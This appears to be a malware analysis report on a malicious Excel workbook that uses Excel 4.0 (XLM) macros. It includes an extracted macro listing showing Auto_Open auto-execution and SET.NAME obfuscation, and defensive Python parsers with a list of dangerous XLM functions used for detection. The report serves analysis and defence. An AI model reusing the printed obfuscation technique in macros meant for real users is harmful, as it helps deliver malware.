Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 322ee1a8d7f3f9f2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 36.5 KB
Created: 2020-11-27 11:41:13
Authoring application: Microsoft Excel
First seen: 2021-03-01
MD5: 7a51d386c11748d3b2c56d58d204089e
SHA-1: 8ce3cadda1112c2615190ea3047bc2608e3c1b3a
SHA-256: 322ee1a8d7f3f9f2814ccb12c2074ebd56781813eca0f06d83e07486018245f1
Risk score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. Excel stores these auto-exec names in the NAME (Lbl) record as a one-byte built-in index (Auto_Open is 0x01) rather than as the literal string "Auto_Open", so a byte-string search for the name can miss it; the recovered macro listing confirms that the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN)
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with XLM formula functions that can invoke programs, write files, or transfer control without any VBA (the XLM functions in this class include EXEC, CALL, REGISTER, FOPEN/FWRITE and FORMULA).
  • Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN)
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
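The first heuristic rests on the way Excel stores Auto_Open: as a built-in name index, not as text. The following is an added example, not code from this analysis pipeline and not oletools code, that walks BIFF8 records directly: it flags Excel 4.0 macro sheets from the BOUNDSHEET dt byte (hidden and very-hidden sheets included), decodes NAME records whether the auto-exec name is stored as the built-in index or as literal text, and reads a ptgRef3d token to show where execution starts. Record layouts follow MS-XLS. The input stream is constructed inline to mirror the BOUNDSHEET and Auto_Open entries seen in this sample's listing (with the macro sheet marked very hidden for illustration); it is not bytes extracted from the file above.

```python
import struct

# Record ids and field layouts follow MS-XLS (BIFF8)
BOF, EOF_REC, NAME, BOUNDSHEET = 0x0809, 0x000A, 0x0018, 0x0085
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}
HIDDEN_STATES = {0: "visible", 1: "hidden", 2: "very hidden"}
# fBuiltin names are stored as a one-byte index, never as the text "Auto_Open"
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTO_EXEC = tuple(n.lower() for n in BUILTIN_NAMES.values())


def iter_records(stream):
    """Yield (type, payload) per BIFF record; stop quietly at a truncated one."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4:off + 4 + rlen]
        if len(payload) < rlen:
            break
        off += 4 + rlen
        yield rtype, payload


def read_string(buf, off, cch):
    """XLUnicodeStringNoCch: one flag byte (bit 0 = UTF-16LE), then cch chars."""
    if buf[off] & 0x01:
        return buf[off + 1:off + 1 + 2 * cch].decode("utf-16-le", "replace")
    return buf[off + 1:off + 1 + cch].decode("latin-1")


def col_letters(col):
    """0-based column index to A1 letters (0 -> A, 27 -> AB)."""
    out, n = "", col + 1
    while n:
        n, r = divmod(n - 1, 26)
        out = chr(65 + r) + out
    return out


def parse_boundsheet(data):
    """BoundSheet8: lbPlyPos(4) hsState(1) dt(1) cch(1), then the sheet name."""
    _pos, hs_state, dt, cch = struct.unpack_from("<IBBB", data, 0)
    return {"name": read_string(data, 7, cch),
            "type": SHEET_TYPES.get(dt, f"type {dt:#x}"),
            "state": HIDDEN_STATES.get(hs_state, f"state {hs_state:#x}")}


def parse_name(data):
    """Lbl record: 14-byte header, Name string, then rgce (formula tokens)."""
    flags, _key, cch, cce, _res, itab = struct.unpack_from("<HBBHHH", data, 0)
    builtin = bool(flags & 0x20)
    text = read_string(data, 14, cch)
    if builtin and len(text) == 1:               # the single "character" is the index
        text = BUILTIN_NAMES.get(ord(text), f"builtin {ord(text):#x}")
    str_len = 1 + (2 * cch if data[14] & 0x01 else cch)
    rgce = data[14 + str_len:14 + str_len + cce]
    target = None
    if len(rgce) >= 7 and rgce[0] & 0x1F == 0x1A:        # ptgRef3d (0x3A/0x5A/0x7A)
        _ixti, row, col = struct.unpack_from("<HHH", rgce, 1)
        target = f"{col_letters(col & 0x3FFF)}{row + 1}"  # bits 14-15 of col are rel flags
    return {"name": text, "builtin": builtin, "hidden": bool(flags & 0x01),
            "itab": itab, "target": target}


def scan_workbook_stream(stream):
    """Collect sheets and defined names; report XLM sheets and auto-exec names."""
    sheets, names, findings = [], [], []
    for rtype, payload in iter_records(stream):
        if rtype == BOUNDSHEET:
            sheets.append(parse_boundsheet(payload))
        elif rtype == NAME:
            names.append(parse_name(payload))
    for s in sheets:
        if s["type"] == "macro sheet":
            findings.append(f"Excel 4.0 macro sheet '{s['name']}' ({s['state']})")
    for n in names:
        if n["name"].lower().startswith(AUTO_EXEC):      # built-in index or literal text
            how = "built-in index" if n["builtin"] else "literal name"
            findings.append(f"auto-exec name {n['name']} ({how}) -> {n['target']}")
    return {"sheets": sheets, "names": names, "findings": findings}


# --- constructed sample stream: built here, not bytes from the analysed file ---
def _rec(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload

def _boundsheet(name, dt, hs_state):
    b = name.encode("latin-1")
    return _rec(BOUNDSHEET, struct.pack("<IBBB", 0, hs_state, dt, len(b)) + b"\x00" + b)

def _name(name, builtin=False, rgce=b""):
    s = bytes([name]) if builtin else name.encode("latin-1")   # built-in: index byte
    hdr = struct.pack("<HBBHHH", 0x20 if builtin else 0, 0, len(s), len(rgce), 0, 0)
    return _rec(NAME, hdr + b"\x00" * 4 + b"\x00" + s + rgce)

SAMPLE_STREAM = (
    _rec(BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0, 0, 0, 0))
    + _boundsheet("Sheet", 0x00, 0)
    + _boundsheet("gyYVXfpAuPX", 0x01, 2)                 # XLM sheet, very hidden
    + _name(0x01, builtin=True, rgce=struct.pack("<BHHH", 0x3A, 0, 163, 5))  # Auto_Open -> F164
    + _name("qYmckm")                                     # SET.NAME variable, no formula
    + _rec(EOF_REC, b"")
)
```

For a real .xls, pass in the bytes of the OLE stream named Workbook (for example olefile.OleFileIO(path).openstream("Workbook").read(); olefile ships with oletools). Two limits to keep in mind: BIFF5 files name the stream Book and use a different string encoding, and records split across CONTINUE records are not re-joined here. olevba handles both, which is why its listing is the authoritative source for this report; the value of the structural walk is that it does not depend on the text "Auto_Open" ever appearing in the file.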

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6835 bytes
SHA-256: b362fe33eca724019b7d6c5a0bf723910068755aa6f6ef6f76376e5aa5efb05e

Preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  gyYVXfpAuPX
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!F164 
' 0018     24 LABEL : Cell Value, String Constant - BMwRuXUVe len=0 
' 0018     24 LABEL : Cell Value, String Constant - ckXsMPiGg len=0 
' 0018     24 LABEL : Cell Value, String Constant - cvxezMDGe len=0 
' 0018     21 LABEL : Cell Value, String Constant - ezjEim len=0 
' 0018     23 LABEL : Cell Value, String Constant - FKUkKtwl len=0 
' 0018     23 LABEL : Cell Value, String Constant - fSJhevII len=0 
' 0018     21 LABEL : Cell Value, String Constant - GlzeeJ len=0 
' 0018     23 LABEL : Cell Value, String Constant - gTYOcBOg len=0 
' 0018     23 LABEL : Cell Value, String Constant - iByxXjjU len=0 
' 0018     21 LABEL : Cell Value, String Constant - jUrYUY len=0 
' 0018     27 LABEL : Cell Value, String Constant - lVSjppGaklwI len=0 
' 0018     21 LABEL : Cell Value, String Constant - pmEUPN len=0 
' 0018     21 LABEL : Cell Value, String Constant - qYmckm len=0 
' 0018     22 LABEL : Cell Value, String Constant - rzYpyXD len=0 
' 0018     20 LABEL : Cell Value, String Constant - sZkGC len=0 
' 0018     23 LABEL : Cell Value, String Constant - vbQQIOEe len=0 
' 0018     26 LABEL : Cell Value, String Constant - wfIXvxFyEgr len=0 
' 0018     23 LABEL : Cell Value, String Constant - xeWiqvND len=0 
' 0018     24 LABEL : Cell Value, String Constant - ZdQgROQdN len=0 
' 0018     24 LABEL : Cell Value, String Constant - zlOCrKzwi len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  gyYVXfpAuPX,T45,"",-391.00000000000000000000
'  gyYVXfpAuPX,T46,"",958.00000000000000000000
'  gyYVXfpAuPX,T47,"",467.00000000000000000000
'  gyYVXfpAuPX,T48,"",364.00000000000000000000
'  gyYVXfpAuPX,T49,"",-561.00000000000000000000
'  gyYVXfpAuPX,T50,"",470.00000000000000000000
'  gyYVXfpAuPX,F77,"SET.NAME("qYmckm",0+VALUE("0"))",""
'  gyYVXfpAuPX,F82,"SET.NAME("GlzeeJ",qYmckm)",""
'  gyYVXfpAuPX,F84,"SET.NAME("rzYpyXD",qYmckm)",""
'  gyYVXfpAuPX,F89,"SET.NAME("sZkGC",COUNTA(ckXsMPiGg))",""
'  gyYVXfpAuPX,F92,"SET.NAME("jUrYUY",COUNTA(cvxezMDGe))",""
'  gyYVXfpAuPX,F96,[],""
'  gyYVXfpAuPX,F98,"SET.NAME("xeWiqvND","")",""
'  gyYVXfpAuPX,F102,"GlzeeJ",""
'  gyYVXfpAuPX,F104,"SET.NAME("wfIXvxFyEgr",HLOOKUP("*",ckXsMPiGg,GlzeeJ,FALSE))",""
'  gyYVXfpAuPX,F107,"ZdQgROQdN",""
'  gyYVXfpAuPX,F110,"SET.NAME("fSJhevII",qYmckm)",""
'  gyYVXfpAuPX,F114,[],""
'  gyYVXfpAuPX,F118,"fSJhevII",""
'  gyYVXfpAuPX,F123,"gTYOcBOg",""
'  gyYVXfpAuPX,F127,"vbQQIOEe",""
'  gyYVXfpAuPX,F131,"ezjEim",""
'  gyYVXfpAuPX,F133,"SET.NAME("zlOCrKzwi",VALUE(HLOOKUP("*",cvxezMDGe,ezjEim,FALSE)))",""
'  gyYVXfpAuPX,F136,"BMwRuXUVe",""
'  gyYVXfpAuPX,F140,"xeWiqvND",""
'  gyYVXfpAuPX,F142,"rzYpyXD",""
'  gyYVXfpAuPX,F145,NEXT(),""
'  gyYVXfpAuPX,F147,"pmEUPN",""
'  gyYVXfpAuPX,F152,[],""
'  gyYVXfpAuPX,F155,"iByxXjjU",""
'  gyYVXfpAuPX,F158,NEXT(),""
'  gyYVXfpAuPX,F160,RETURN(),""
'  gyYVXfpAuPX,F189,"SET.NAME("lVSjppGaklwI",F77)",""
'  gyYVXfpAuPX,F191,"ckXsMPiGg",""
'  gyYVXfpAuPX,F196,"SET.NAME("cvxezMDGe",R52C13)",""
'  gyYVXfpAuPX,F199,"SET.NAME("iByxXjjU",208)",""
'  gyYVXfpAuPX,F204,"SET.NAME("FKUkKtwl",6)",""
'  gyYVXfpAuPX,F207,lVSjppGaklwI(),""
'  gyYVXfpAuPX,F208,HALT(),""
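A triage pass over olevba's decoded formula listing, as an added example that is neither this analysis platform's code nor part of oletools. It parses rows of the form sheet,reference,formula,value, rebuilds the SET.NAME variable table the macro above uses for indirection, resolves alias chains (GlzeeJ -> qYmckm -> 0+VALUE("0")), spots a name that is defined as a cell reference and then invoked as a subroutine (lVSjppGaklwI -> F77, the control transfer at F207), and surfaces calls to the dangerous XLM function class. The rows are copied from the listing above; the EXEC row at F300 is constructed for the example and does not occur in this sample, and the DANGEROUS grouping is this example's own.

```python
import re

# Excel 4.0 macro functions a triage pass should always surface. The names are
# real XLM functions; the grouping and labels are this example's own.
DANGEROUS = {
    "EXEC": "run program", "CALL": "call DLL export", "REGISTER": "register DLL export",
    "RUN": "run macro", "FOPEN": "file I/O", "FWRITE": "file I/O", "FWRITELN": "file I/O",
    "FORMULA": "write cell (self-modifying)", "FORMULA.FILL": "write cell (self-modifying)",
    "GET.WORKSPACE": "environment probe", "GET.WINDOW": "environment probe",
}
FLOW = {"NEXT", "RETURN", "HALT", "GOTO", "WHILE", "FOR", "IF"}

# One listing row: sheet,ref,formula,value. The formula field keeps its inner
# quotes unescaped, so a CSV reader would choke; the greedy group takes care of it.
LINE_RE = re.compile(r'''^'?\s*([^,\s]+),([A-Z]+\d+),(.*),("[^"]*"|[^,"]*)\s*$''')
SETNAME_RE = re.compile(r'^SET\.NAME\("([^"]+)",(.*)\)$')
CALL_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")
INVOKE_RE = re.compile(r"^([A-Za-z_][\w.]*)\(\)$")      # name() used as a subroutine
BARE_NAME_RE = re.compile(r"^[A-Za-z_][\w.]*$")
CELL_RE = re.compile(r"^[A-Z]{1,3}\d+$")


def parse_line(line):
    """Return {sheet, ref, formula, value} for a listing row, or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    sheet, ref, formula, value = m.groups()
    if len(formula) >= 2 and formula[0] == formula[-1] == '"':
        formula = formula[1:-1]
    return {"sheet": sheet, "ref": ref, "formula": formula, "value": value.strip('"')}


def resolve(name, set_names, limit=16):
    """Follow SET.NAME aliases (name -> name -> expression) with a cycle guard."""
    seen = set()
    while name in set_names and name not in seen and len(seen) < limit:
        seen.add(name)
        name = set_names[name]
    return name


def triage(listing):
    cells = [c for c in map(parse_line, listing.splitlines()) if c]
    set_names = {}
    for c in cells:                            # pass 1: the variable table
        m = SETNAME_RE.match(c["formula"])
        if m:
            set_names[m.group(1)] = m.group(2)
    dangerous, flow, indirect_calls, name_evals = [], [], [], []
    for c in cells:                            # pass 2: what each cell does
        f = c["formula"]
        for fn in CALL_RE.findall(f):
            if fn in DANGEROUS:
                arg = f[f.index(fn + "(") + len(fn) + 1:].rstrip(")")
                shown = resolve(arg, set_names) if BARE_NAME_RE.match(arg) else arg
                dangerous.append((c["ref"], fn, DANGEROUS[fn], shown))
            elif fn in FLOW:
                flow.append((c["ref"], fn))
        m = INVOKE_RE.match(f)
        if m and CELL_RE.match(set_names.get(m.group(1), "")):
            indirect_calls.append((c["ref"], m.group(1), set_names[m.group(1)]))
        elif BARE_NAME_RE.match(f) and f in set_names:
            name_evals.append((c["ref"], f, resolve(f, set_names)))
    return {"cells": cells, "set_names": set_names, "dangerous": dangerous,
            "flow": flow, "indirect_calls": indirect_calls, "name_evals": name_evals}


# Rows copied from the listing above, plus one constructed row (F300, not present
# in the analysed sample) so the dangerous-function check has something to find.
SAMPLE_LISTING = '''\
'  gyYVXfpAuPX,T45,"",-391.00000000000000000000
'  gyYVXfpAuPX,F77,"SET.NAME("qYmckm",0+VALUE("0"))",""
'  gyYVXfpAuPX,F82,"SET.NAME("GlzeeJ",qYmckm)",""
'  gyYVXfpAuPX,F96,[],""
'  gyYVXfpAuPX,F102,"GlzeeJ",""
'  gyYVXfpAuPX,F104,"SET.NAME("wfIXvxFyEgr",HLOOKUP("*",ckXsMPiGg,GlzeeJ,FALSE))",""
'  gyYVXfpAuPX,F145,NEXT(),""
'  gyYVXfpAuPX,F160,RETURN(),""
'  gyYVXfpAuPX,F189,"SET.NAME("lVSjppGaklwI",F77)",""
'  gyYVXfpAuPX,F207,lVSjppGaklwI(),""
'  gyYVXfpAuPX,F208,HALT(),""
'  gyYVXfpAuPX,F300,"EXEC(wfIXvxFyEgr)",""
'''

if __name__ == "__main__":
    result = triage(SAMPLE_LISTING)
    for key in ("indirect_calls", "name_evals", "dangerous"):
        print(key, result[key])
```

The point of the two passes is that SET.NAME turns cells into variables: the listing shows names being assigned (F77, F82, F104, F189) and then evaluated bare (F102) or called (F207), so a flat grep for EXEC or CALL sees only what is literal at extraction time. Resolving the alias table first shows what an eventual call site actually receives, and an HLOOKUP("*", range, index, FALSE) result in that position is the usual sign that the real command string lives in worksheet cells rather than in the macro sheet.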